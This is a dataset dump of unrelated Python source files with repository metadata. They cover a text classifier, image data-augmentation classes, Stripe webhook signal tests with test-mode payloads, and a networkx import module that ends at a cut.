from .handler import handler
14.5
28
0.827586
4
29
6
0.75
0
0
0
0
0
0
0
0
0
0
0
0.137931
29
1
29
29
0.96
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
aa758a688fca0ef7b8f5cb9e9ae7ecd910153e7d
1,072
py
Python
cherry/__init__.py
natethinks/cherry
a482621a3e397f6667f21e16d5ec0eb12c7fc4fb
[ "MIT" ]
1
2020-03-07T16:59:09.000Z
2020-03-07T16:59:09.000Z
cherry/__init__.py
natethinks/cherry
a482621a3e397f6667f21e16d5ec0eb12c7fc4fb
[ "MIT" ]
null
null
null
cherry/__init__.py
natethinks/cherry
a482621a3e397f6667f21e16d5ec0eb12c7fc4fb
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Naive Bayes Classifier ~~~~~~~~~~~~~~~~~~~~~ cherry is a python classifier library usage: >>> import cherry >>> result = cherry.classify('警方召开了全省集中打击赌博违法犯罪活动专项行动电视电话会议。会议的重点是“查处”六合彩、赌球赌马等赌博活动。') >>> result.percentage [('normal.dat', 0.7310585786300049), ('gamble.dat', 0.2689414213699951)] >>> result.words_list [('查处', 1.6550930245052333), ('电视电话会议', 0.844162808288905), ('活动', 3.0746199776976972), ('赌博', 1.8186042209197311), ('警方', 2.7900729573442176), ('六合彩', 1.4727714677112775), ('违法犯罪', 2.7900729573442176), ('全省', 1.0673063596031147), ('集中', 1.1626165394074395), ('召开', 1.2496279163970687), ('打击', 3.0687863598132381), ('专项', 1.5373099888488495), ('赌球', 1.7604535401630592), ('会议', 2.0969257767842722), ('重点', 2.0228178046305505), ('赌马', 0.1510156277289596), ('行动', 2.3482402050651787)] :copyright: (c) 2018-2019 by Windson Yang :license: MIT License, see LICENSE for more details. """ # workflow: search -> display -> train -> classify -> performance from .api import classify, train, performance, search, display
51.047619
485
0.679104
116
1,072
6.267241
0.715517
0.011004
0
0
0
0
0
0
0
0
0
0.348055
0.112873
1,072
20
486
53.6
0.416404
0.928172
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
aa8ca47187baba87fd1dbec992aca91a3ce52b34
194
py
Python
utils/config.py
dschori/Agroscope
69a174d400b5cc1f842a825d73ade4b7ddb28590
[ "MIT" ]
2
2021-01-20T08:31:15.000Z
2021-07-26T13:26:03.000Z
utils/config.py
dschori/Agroscope
69a174d400b5cc1f842a825d73ade4b7ddb28590
[ "MIT" ]
7
2020-03-31T11:30:35.000Z
2022-02-10T01:39:46.000Z
utils/config.py
dschori/Rumex-Detection
69a174d400b5cc1f842a825d73ade4b7ddb28590
[ "MIT" ]
null
null
null
class Config(object): DATA_BASE_PATH = '../data' RAW_PATH = '../data/LabelingTool/' DATA_IMAGE_PATH = DATA_BASE_PATH + '/Images' DATA_MASK_PATH = DATA_BASE_PATH + '/Masks' SHAPE = (512,768)
32.333333
45
0.71134
28
194
4.535714
0.535714
0.251969
0.283465
0.251969
0
0
0
0
0
0
0
0.035503
0.128866
194
6
46
32.333333
0.715976
0
0
0
0
0
0.210256
0.107692
0
0
0
0
0
1
0
false
0
0
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
6
aad8cfb926613355ab45ff15f32052d7c421288c
154
py
Python
hydraseq/__init__.py
Niarfe/hydraseq
43939e58857581fd493bf603038dcb72c419f30f
[ "MIT" ]
null
null
null
hydraseq/__init__.py
Niarfe/hydraseq
43939e58857581fd493bf603038dcb72c419f30f
[ "MIT" ]
1
2019-11-03T01:00:18.000Z
2019-11-03T01:00:18.000Z
hydraseq/__init__.py
hydraseq/hydraseq
43939e58857581fd493bf603038dcb72c419f30f
[ "MIT" ]
null
null
null
name = "hydraseq" __version__ = '0.0.30' from hydraseq.hydraseq import Node from hydraseq.hydraseq import Hydraseq from hydraseq.automata import DFAstate
25.666667
38
0.811688
21
154
5.761905
0.47619
0.297521
0.330579
0.429752
0
0
0
0
0
0
0
0.029412
0.116883
154
5
39
30.8
0.860294
0
0
0
0
0
0.090909
0
0
0
0
0
0
1
0
false
0
0.6
0
0.6
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
aae0944989401f7bbde8ab0241eac9846a67b2fb
7,812
py
Python
nutszebra_data_augmentation.py
nutszebra/trainer
9359c6ed01c5dad832e957e0adc1a41c79967044
[ "MIT" ]
5
2016-12-25T02:55:28.000Z
2018-05-30T10:40:36.000Z
nutszebra_data_augmentation.py
nutszebra/trainer
9359c6ed01c5dad832e957e0adc1a41c79967044
[ "MIT" ]
null
null
null
nutszebra_data_augmentation.py
nutszebra/trainer
9359c6ed01c5dad832e957e0adc1a41c79967044
[ "MIT" ]
2
2017-12-14T19:45:04.000Z
2019-08-24T03:19:35.000Z
import numpy as np import nutszebra_data_augmentation_picture from functools import wraps da = nutszebra_data_augmentation_picture.DataAugmentationPicture() def reset(func): @wraps(func) def wrapper(self, *args, **kwargs): da() return func(self, *args, **kwargs) return wrapper class DataAugmentationCifar10NormalizeSmall(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(32, 36)).crop_picture_randomly(1.0, sizes=(32, 32)).cutout(0.5, sizes=(16, 16)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(32, 32), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeMiddle(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(64, 68)).crop_picture_randomly(1.0, sizes=(64, 64)).cutout(0.5, sizes=(32, 32)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(64, 64), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeBig(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(128, 132)).crop_picture_randomly(1.0, sizes=(128, 128)).cutout(0.5, sizes=(64, 64)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(128, 128), interpolation='bilinear').normalize_picture(1.0, 
value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeBigger(object): @staticmethod @reset def train(img): da.convert_to_image_format(img).resize_image_randomly(1.0, size_range=(256, 512)).crop_picture_randomly(1.0, sizes=(224, 224)).cutout(0.5, sizes=(112, 112)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.convert_to_image_format(img).resize_image_randomly(1.0, size_range=(384, 384), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationCifar10NormalizeHuge(object): @staticmethod @reset def train(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(299, 512)).crop_picture_randomly(1.0, sizes=(299, 299)).cutout(0.5, sizes=(114, 114)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da(img).convert_to_image_format(1.0).resize_image_randomly(1.0, size_range=(406, 406), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeSmall(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(32, 36)).crop_picture_randomly(1.0, sizes=(32, 32)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(32, 32), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeMiddle(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(64, 68)).crop_picture_randomly(1.0, sizes=(64, 64)).normalize_picture(1.0, 
value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(64, 64), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeBig(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(129, 132)).crop_picture_randomly(1.0, sizes=(128, 128)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(128, 128), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeBigger(object): @staticmethod @reset def train(img): da.load_picture(img).gray_to_rgb(1.0).resize_image_randomly(1.0, size_range=(256, 512)).crop_picture_randomly(1.0, sizes=(224, 224)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).gray_to_rgb(1.0).resize_image_randomly(1.0, size_range=(384, 384), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DataAugmentationNormalizeHuge(object): @staticmethod @reset def train(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(299, 512)).crop_picture_randomly(1.0, sizes=(299, 299)).normalize_picture(1.0, value=10.).horizontal_flipping(0.5).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img).resize_image_randomly(1.0, size_range=(406, 406), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info class DoNothing(object): @staticmethod @reset def train(img): return img, 
None @staticmethod @reset def test(img): return img, None class Ndim(object): def __init__(self, ndim=3): self.ndim = ndim def train(self, img): img = np.array(img) if not img.ndim == self.ndim: diff = self.ndim - img.ndim img = np.reshape(img, (1,) * diff + img.shape) return img, None def test(self, img): img = np.array(img) if not img.ndim == self.ndim: diff = self.ndim - img.ndim img = np.reshape(img, (1,) * diff + img.shape) return img, None class DataAugmentationNormalizeBigOneChannel(object): @staticmethod @reset def train(img): da.load_picture(img, ndim=2).resize_image_randomly(1.0, size_range=(129, 132)).crop_picture_randomly(1.0, sizes=(128, 128)).normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info @staticmethod @reset def test(img): da.load_picture(img, ndim=2).resize_image_randomly(1.0, size_range=(128, 128), interpolation='bilinear').normalize_picture(1.0, value=10.).convert_to_chainer_format(1.0) return da.x, da.info
37.023697
259
0.698157
1,160
7,812
4.493103
0.080172
0.033385
0.063315
0.084421
0.853607
0.848427
0.841903
0.835955
0.835955
0.82924
0
0.070457
0.162442
7,812
210
260
37.2
0.72612
0
0
0.683871
0
0
0.011265
0
0
0
0
0
0
1
0.187097
false
0
0.019355
0.012903
0.470968
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2aed6ae4246e829a13d68c37df04665448927dca
165
py
Python
src/z3c/saconfig/__init__.py
nazrulworld/z3c.saconfig
6096b98935561b7d6f333bba40d1a850241e2da1
[ "ZPL-2.1" ]
null
null
null
src/z3c/saconfig/__init__.py
nazrulworld/z3c.saconfig
6096b98935561b7d6f333bba40d1a850241e2da1
[ "ZPL-2.1" ]
null
null
null
src/z3c/saconfig/__init__.py
nazrulworld/z3c.saconfig
6096b98935561b7d6f333bba40d1a850241e2da1
[ "ZPL-2.1" ]
null
null
null
from z3c.saconfig.scopedsession import Session, named_scoped_session from z3c.saconfig.utility import ( GloballyScopedSession, SiteScopedSession, EngineFactory)
41.25
68
0.848485
17
165
8.117647
0.705882
0.101449
0.217391
0
0
0
0
0
0
0
0
0.013423
0.09697
165
3
69
55
0.912752
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2d5412ab2ba001f5808bad65ebb0c7ffb5104246
20
py
Python
coresender/requests/__init__.py
coresender/coresender-sdk-python
76666eb4187042d35b88c34cb3201591dd86ffca
[ "MIT" ]
8
2020-06-02T13:47:40.000Z
2020-07-27T11:48:59.000Z
coresender/requests/__init__.py
coresender/coresender-sdk-python
76666eb4187042d35b88c34cb3201591dd86ffca
[ "MIT" ]
null
null
null
coresender/requests/__init__.py
coresender/coresender-sdk-python
76666eb4187042d35b88c34cb3201591dd86ffca
[ "MIT" ]
null
null
null
from .send import *
10
19
0.7
3
20
4.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.2
20
1
20
20
0.875
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2d6c9a9c90d748596a0ea34527713abc05caaac3
14,322
py
Python
tests/test_webhooks.py
gbozee/pystripe
42ffef976bfec5ee0021c53dcd29676abdf78204
[ "MIT" ]
null
null
null
tests/test_webhooks.py
gbozee/pystripe
42ffef976bfec5ee0021c53dcd29676abdf78204
[ "MIT" ]
null
null
null
tests/test_webhooks.py
gbozee/pystripe
42ffef976bfec5ee0021c53dcd29676abdf78204
[ "MIT" ]
1
2019-11-05T18:51:00.000Z
2019-11-05T18:51:00.000Z
from pystripe.api import signals from pystripe import utils from dispatch import receiver import pytest @receiver(signals.successful_payment_signal) def signal_called(sender, **kwargs): kwargs.pop("signal", None) generic_function(**kwargs) def generic_function(**params): print(params) @receiver(signals.failed_payment_signal) def signal_called_2(sender, **kwargs): kwargs.pop("signal", None) generic_function(**kwargs) @pytest.fixture def mock_generic_func(mocker): mock_successful_call = mocker.patch("test_webhooks.generic_function") mock_digest = mocker.patch("stripe.WebhookSignature.verify_header") mock_digest.return_value = True return mock_successful_call def test_successful_charge_webhook_signal( mock_generic_func, stripe_api: utils.StripeAPI ): body = """{ "id": "evt_1FZp49Hv0Y0PURSqIxXfx6W1", "object": "event", "api_version": "2019-03-14", "created": 1572572201, "data": { "object": { "id": "ch_1FZp48Hv0Y0PURSq0buZ6d6f", "object": "charge", "amount": 2000, "amount_refunded": 0, "application": null, "application_fee": null, "application_fee_amount": null, "balance_transaction": "txn_1FZp48Hv0Y0PURSqV70KLTLF", "billing_details": { "address": {"city": null, "country": null, "line1": null, "line2": null, "postal_code": null, "state": null}, "email": null, "name": null, "phone": null }, "captured": true, "created": 1572572200, "currency": "usd", "customer": null, "description": null, "destination": null, "dispute": null, "failure_code": null, "failure_message": null, "fraud_details": {}, "invoice": null, "livemode": false, "metadata": {}, "on_behalf_of": null, "order": null, "outcome": {"network_status": "approved_by_network", "reason": null, "risk_level": "normal", "risk_score": 42, "seller_message": "Payment complete.", "type": "authorized"}, "paid": true, "payment_intent": null, "payment_method": "card_1FZp48Hv0Y0PURSqsmipr0Rv", "payment_method_details": {"card": {"brand": "visa", "checks": {"address_line1_check": null, "address_postal_code_check": null, 
"cvc_check": null}, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": null, "last4": "4242", "network": "visa", "three_d_secure": null, "wallet": null}, "type": "card"}, "receipt_email": null, "receipt_number": null, "receipt_url": "https://pay.stripe.com/receipts/acct_1EJOOLHv0Y0PURSq/ch_1FZp48Hv0Y0PURSq0buZ6d6f/rcpt_G616Ubt8hAj7Th4vdY2MfK34OAIxOPi", "refunded": false, "refunds": {"object": "list", "data": [], "has_more": false, "total_count": 0, "url": "/v1/charges/ch_1FZp48Hv0Y0PURSq0buZ6d6f/refunds"}, "review": null, "shipping": null, "source": {"id": "card_1FZp48Hv0Y0PURSqsmipr0Rv", "object": "card", "address_city": null, "address_country": null, "address_line1": null, "address_line1_check": null, "address_line2": null, "address_state": null, "address_zip": null, "address_zip_check": null, "brand": "Visa", "country": "US", "customer": null, "cvc_check": null, "dynamic_last4": null, "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "last4": "4242", "metadata": {}, "name": null, "tokenization_method": null}, "source_transfer": null, "statement_descriptor": null, "statement_descriptor_suffix": null, "status": "succeeded", "transfer_data": null, "transfer_group": null}}, "livemode": false, "pending_webhooks": 3, "request": {"id": "req_fGRGYYasLgdcRq", "idempotency_key": null}, "type": "charge.succeeded" }""" stripe_api.webhook_api.verify("unique_signature", body) mock_generic_func.assert_called_once_with( event="charge.succeeded", data={ "id": "ch_1FZp48Hv0Y0PURSq0buZ6d6f", "amount": 20.0, "currency": "usd", "customer": None, "payment_details": { "brand": "visa", "checks": { "address_line1_check": None, "address_postal_code_check": None, "cvc_check": None, }, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": None, "last4": "4242", "network": "visa", "three_d_secure": None, 
"wallet": None, }, "status": "succeeded", "amount_refunded": 0, "failure": {}, "outcome": { "network_status": "approved_by_network", "reason": None, "risk_level": "normal", "risk_score": 42, "seller_message": "Payment complete.", "type": "authorized", }, }, ) def test_failed_payment_transfer(mock_generic_func, stripe_api): body = """ {"id": "evt_1FZpYhHv0Y0PURSqOU8uvKJD", "object": "event", "api_version": "2019-03-14", "created": 1572574095, "data": {"object": {"id": "ch_1FZpYhHv0Y0PURSqnaxbrowv", "object": "charge", "amount": 2000, "amount_refunded": 0, "application": null, "application_fee": null, "application_fee_amount": null, "balance_transaction": null, "billing_details": {"address": {"city": null, "country": null, "line1": null, "line2": null, "postal_code": null, "state": null}, "email": null, "name": null, "phone": null}, "captured": false, "created": 1572574095, "currency": "usd", "customer": null, "description": null, "destination": null, "dispute": null, "failure_code": "card_declined", "failure_message": "Your card was declined.", "fraud_details": {}, "invoice": null, "livemode": false, "metadata": {}, "on_behalf_of": null, "order": null, "outcome": {"network_status": "declined_by_network", "reason": "generic_decline", "risk_level": "normal", "risk_score": 55, "seller_message": "The bank did not return any further details with this decline.", "type": "issuer_declined"}, "paid": false, "payment_intent": null, "payment_method": "card_1FZpYhHv0Y0PURSqJWu9ppxe", "payment_method_details": {"card": {"brand": "visa", "checks": {"address_line1_check": null, "address_postal_code_check": null, "cvc_check": null}, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "invoLvA3S2339Hlz", "funding": "credit", "installments": null, "last4": "0002", "network": "visa", "three_d_secure": null, "wallet": null}, "type": "card"}, "receipt_email": null, "receipt_number": null, "receipt_url": 
"https://pay.stripe.com/receipts/acct_1EJOOLHv0Y0PURSq/ch_1FZpYhHv0Y0PURSqnaxbrowv/rcpt_G61bfiwujEVbmBleDeprVDK1Z4eXnCX", "refunded": false, "refunds": {"object": "list", "data": [], "has_more": false, "total_count": 0, "url": "/v1/charges/ch_1FZpYhHv0Y0PURSqnaxbrowv/refunds"}, "review": null, "shipping": null, "source": {"id": "card_1FZpYhHv0Y0PURSqJWu9ppxe", "object": "card", "address_city": null, "address_country": null, "address_line1": null, "address_line1_check": null, "address_line2": null, "address_state": null, "address_zip": null, "address_zip_check": null, "brand": "Visa", "country": "US", "customer": null, "cvc_check": null, "dynamic_last4": null, "exp_month": 11, "exp_year": 2020, "fingerprint": "invoLvA3S2339Hlz", "funding": "credit", "last4": "0002", "metadata": {}, "name": null, "tokenization_method": null}, "source_transfer": null, "statement_descriptor": null, "statement_descriptor_suffix": null, "status": "failed", "transfer_data": null, "transfer_group": null}}, "livemode": false, "pending_webhooks": 3, "request": {"id": "req_t91WTWN0dgrmmJ", "idempotency_key": null}, "type": "charge.failed"} """ stripe_api.webhook_api.verify("unique_signature", body) mock_generic_func.assert_called_once_with( event="charge.failed", data={ "id": "ch_1FZpYhHv0Y0PURSqnaxbrowv", "amount": 20.0, "currency": "usd", "customer": None, "payment_details": { "brand": "visa", "checks": { "address_line1_check": None, "address_postal_code_check": None, "cvc_check": None, }, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "invoLvA3S2339Hlz", "funding": "credit", "installments": None, "last4": "0002", "network": "visa", "three_d_secure": None, "wallet": None, }, "status": "failed", "amount_refunded": 0, "failure": {"code": "card_declined", "message": "Your card was declined."}, "outcome": { "network_status": "declined_by_network", "reason": "generic_decline", "risk_level": "normal", "risk_score": 55, "seller_message": "The bank did not return any further 
details with this decline.", "type": "issuer_declined", }, }, ) def test_refund_payment(mock_generic_func, stripe_api): body = """{ "id": "evt_1FZpUiHv0Y0PURSq6ht36S8d", "object": "event", "api_version": "2019-03-14", "created": 1572573848, "data": {"object": {"id": "ch_1FZpUgHv0Y0PURSqfcRHxRDP", "object": "charge", "amount": 2000, "amount_refunded": 2000, "application": null, "application_fee": null, "application_fee_amount": null, "balance_transaction": "txn_1FZpUgHv0Y0PURSqadIi9xwK", "billing_details": {"address": {"city": null, "country": null, "line1": null, "line2": null, "postal_code": null, "state": null}, "email": null, "name": null, "phone": null}, "captured": true, "created": 1572573846, "currency": "usd", "customer": null, "description": null, "destination": null, "dispute": null, "failure_code": null, "failure_message": null, "fraud_details": {}, "invoice": null, "livemode": false, "metadata": {}, "on_behalf_of": null, "order": null, "outcome": {"network_status": "approved_by_network", "reason": null, "risk_level": "normal", "risk_score": 51, "seller_message": "Payment complete.", "type": "authorized"}, "paid": true, "payment_intent": null, "payment_method": "card_1FZpUgHv0Y0PURSqykuRPITN", "payment_method_details": {"card": {"brand": "visa", "checks": {"address_line1_check": null, "address_postal_code_check": null, "cvc_check": null}, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": null, "last4": "4242", "network": "visa", "three_d_secure": null, "wallet": null}, "type": "card"}, "receipt_email": null, "receipt_number": null, "receipt_url": "https://pay.stripe.com/receipts/acct_1EJOOLHv0Y0PURSq/ch_1FZpUgHv0Y0PURSqfcRHxRDP/rcpt_G61XPmyNekRgoLd7Rgm626Yg0niyGmu", "refunded": true, "refunds": {"object": "list", "data": [{"id": "re_1FZpUhHv0Y0PURSqAcxHxT8r", "object": "refund", "amount": 2000, "balance_transaction": "txn_1FZpUhHv0Y0PURSqFGxqIJ5D", "charge": 
"ch_1FZpUgHv0Y0PURSqfcRHxRDP", "created": 1572573847, "currency": "usd", "metadata": {}, "reason": null, "receipt_number": null, "source_transfer_reversal": null, "status": "succeeded", "transfer_reversal": null}], "has_more": false, "total_count": 1, "url": "/v1/charges/ch_1FZpUgHv0Y0PURSqfcRHxRDP/refunds"}, "review": null, "shipping": null, "source": {"id": "card_1FZpUgHv0Y0PURSqykuRPITN", "object": "card", "address_city": null, "address_country": null, "address_line1": null, "address_line1_check": null, "address_line2": null, "address_state": null, "address_zip": null, "address_zip_check": null, "brand": "Visa", "country": "US", "customer": null, "cvc_check": null, "dynamic_last4": null, "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "last4": "4242", "metadata": {}, "name": null, "tokenization_method": null}, "source_transfer": null, "statement_descriptor": null, "statement_descriptor_suffix": null, "status": "succeeded", "transfer_data": null, "transfer_group": null}, "previous_attributes": {"amount_refunded": 0, "refunded": false, "refunds": {"data": [], "total_count": 0}}}, "livemode": false, "pending_webhooks": 3, "request": {"id": "req_I1sL6KvveyA7Bp", "idempotency_key": null}, "type": "charge.refunded"} """ stripe_api.webhook_api.verify("unique_signature", body) mock_generic_func.assert_called_once_with( event="charge.refunded", data={ "id": "ch_1FZpUgHv0Y0PURSqfcRHxRDP", "amount": 20.0, "currency": "usd", "customer": None, "payment_details": { "brand": "visa", "checks": { "address_line1_check": None, "address_postal_code_check": None, "cvc_check": None, }, "country": "US", "exp_month": 11, "exp_year": 2020, "fingerprint": "yIwZJF6Qz10rsS7J", "funding": "credit", "installments": None, "last4": "4242", "network": "visa", "three_d_secure": None, "wallet": None, }, "status": "succeeded", "amount_refunded": 20.0, "failure": {}, "outcome": { "network_status": "approved_by_network", "reason": None, "risk_level": 
"normal", "risk_score": 51, "seller_message": "Payment complete.", "type": "authorized", }, }, )
72.333333
2,284
0.594959
1,397
14,322
5.848962
0.161775
0.032309
0.018725
0.014319
0.777016
0.74691
0.738343
0.73614
0.694774
0.676784
0
0.043153
0.234674
14,322
197
2,285
72.700508
0.702308
0
0
0.521978
0
0.043956
0.743646
0.124885
0
0
0
0
0.016484
1
0.038462
false
0
0.021978
0
0.065934
0.038462
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2dbe986f44159abd59f294917bf3bfce93f5279a
235
py
Python
Chapter02/add_matrix_elements.py
aaltopiiri/-The-Python-Workshop
42e41198a109a19f39a4c545cdb830851c41b0a1
[ "MIT" ]
null
null
null
Chapter02/add_matrix_elements.py
aaltopiiri/-The-Python-Workshop
42e41198a109a19f39a4c545cdb830851c41b0a1
[ "MIT" ]
null
null
null
Chapter02/add_matrix_elements.py
aaltopiiri/-The-Python-Workshop
42e41198a109a19f39a4c545cdb830851c41b0a1
[ "MIT" ]
null
null
null
x = [[1, 2, 3],[4, 5, 6],[7, 8, 9]] y = [[10, 11, 12],[13, 14, 15],[16, 17, 18]] z = [[0, 0, 0],[0, 0, 0],[0, 0, 0]] for i in range(len(x)): for j in range (len(x[i])): z[i][j]=x[i][j]+y[i][j] print(z[i][j],end=' ')
33.571429
44
0.382979
57
235
1.578947
0.526316
0.177778
0.233333
0.266667
0.1
0.1
0.1
0.1
0
0
0
0.20339
0.246809
235
7
45
33.571429
0.305085
0
0
0
0
0
0.004237
0
0
0
0
0
0
1
0
false
0
0
0
0
0.142857
0
0
1
null
0
1
1
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
2dc01011d7304f6979cd6be6254e73853533b3d8
6,318
py
Python
networkx/algorithms/__init__.py
SultanOrazbayev/networkx
5be9755636fa4da71da2e28f8467336d3c0164a7
[ "BSD-3-Clause" ]
10,024
2015-01-01T13:06:43.000Z
2022-03-31T12:45:25.000Z
networkx/algorithms/__init__.py
SultanOrazbayev/networkx
5be9755636fa4da71da2e28f8467336d3c0164a7
[ "BSD-3-Clause" ]
3,191
2015-01-01T18:13:11.000Z
2022-03-31T22:06:00.000Z
networkx/algorithms/__init__.py
SultanOrazbayev/networkx
5be9755636fa4da71da2e28f8467336d3c0164a7
[ "BSD-3-Clause" ]
3,272
2015-01-01T05:04:53.000Z
2022-03-31T17:46:35.000Z
from networkx.algorithms.assortativity import * from networkx.algorithms.asteroidal import * from networkx.algorithms.boundary import * from networkx.algorithms.bridges import * from networkx.algorithms.chains import * from networkx.algorithms.centrality import * from networkx.algorithms.chordal import * from networkx.algorithms.cluster import * from networkx.algorithms.clique import * from networkx.algorithms.communicability_alg import * from networkx.algorithms.components import * from networkx.algorithms.coloring import * from networkx.algorithms.core import * from networkx.algorithms.covering import * from networkx.algorithms.cycles import * from networkx.algorithms.cuts import * from networkx.algorithms.d_separation import * from networkx.algorithms.dag import * from networkx.algorithms.distance_measures import * from networkx.algorithms.distance_regular import * from networkx.algorithms.dominance import * from networkx.algorithms.dominating import * from networkx.algorithms.efficiency_measures import * from networkx.algorithms.euler import * from networkx.algorithms.graphical import * from networkx.algorithms.hierarchy import * from networkx.algorithms.hybrid import * from networkx.algorithms.link_analysis import * from networkx.algorithms.link_prediction import * from networkx.algorithms.lowest_common_ancestors import * from networkx.algorithms.isolate import * from networkx.algorithms.matching import * from networkx.algorithms.minors import * from networkx.algorithms.mis import * from networkx.algorithms.moral import * from networkx.algorithms.non_randomness import * from networkx.algorithms.operators import * from networkx.algorithms.planarity import * from networkx.algorithms.planar_drawing import * from networkx.algorithms.reciprocity import * from networkx.algorithms.regular import * from networkx.algorithms.richclub import * from networkx.algorithms.shortest_paths import * from networkx.algorithms.similarity import * from 
networkx.algorithms.graph_hashing import * from networkx.algorithms.simple_paths import * from networkx.algorithms.smallworld import * from networkx.algorithms.smetric import * from networkx.algorithms.structuralholes import * from networkx.algorithms.sparsifiers import * from networkx.algorithms.summarization import * from networkx.algorithms.swap import * from networkx.algorithms.traversal import * from networkx.algorithms.triads import * from networkx.algorithms.vitality import * from networkx.algorithms.voronoi import * from networkx.algorithms.wiener import * # Make certain subpackages available to the user as direct imports from # the `networkx` namespace. from networkx.algorithms import approximation from networkx.algorithms import assortativity from networkx.algorithms import bipartite from networkx.algorithms import node_classification from networkx.algorithms import centrality from networkx.algorithms import chordal from networkx.algorithms import cluster from networkx.algorithms import clique from networkx.algorithms import components from 